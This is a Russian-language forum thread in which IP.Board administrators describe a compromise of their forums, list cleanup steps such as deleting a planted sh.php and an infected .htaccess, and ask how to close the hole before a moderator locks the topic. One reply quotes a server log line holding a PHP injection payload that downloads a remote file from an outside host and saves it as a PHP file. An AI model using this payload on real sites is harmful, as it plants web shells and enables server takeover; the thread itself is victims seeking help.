Перейти к публикации
Дизайн и модификация IPS Community IPBSkinsBETA
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...
Енот

Переходит на сторонний сайт

Рекомендованные сообщения

Итог:

  1. Развернут бейкап
  2. Удален sh.php
  3. Удален .htaccess (зараженный)
  4. Удален photo-128.jpg
  5. Перестроил кеш и переимпортировал хуки
  6. Пропатчил

 

Может кто помочь найти, осталось ли еще что-то?

Поделиться сообщением


Ссылка на сообщение

аналогичная проблема. IPB 3.2.3. По логам обнаружено вот это:

 

GET /forums/index.php?<?error_reporting(0);print(___);copy('http://desktop-dja-1.ru/go/greed.txt','q00p.php');die;?> HTTP/1.0" 301 - "-" "-"

 

следом:

 

GET /forums/ HTTP/1.0" 200 58 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"

 

т.е. на сервере у меня уже находится исполняемый w00t.php. Как закрыть эту дыру?

Поделиться сообщением


Ссылка на сообщение

@mike77, у вас проблемы с отображением сообщений в темах? Я вроде помню давал на предыдущей страницы ссылку на топик где как раз об этом говорится.

Поделиться сообщением


Ссылка на сообщение

У кого-то аналогичные проблемы

В тему из пс заходят с запросами

http://desktop-dja-1.ru

Поделиться сообщением


Ссылка на сообщение

Кто-то месяц назад очень радовался, что отечественные школьники еще пока не используют уязвимость. Вот, пожалуйста :)

 

Прикрою тему, а то будут тут создавать новые и новые посты в полной уверенности, что у них какой-то особый случай злостного хакинга, а не печальное сочетание нуля и полного безразличия к вопросам безопасности своего форума.

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
Гость
Эта тема закрыта для публикации сообщений.

  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу.

×
×
  • Создать...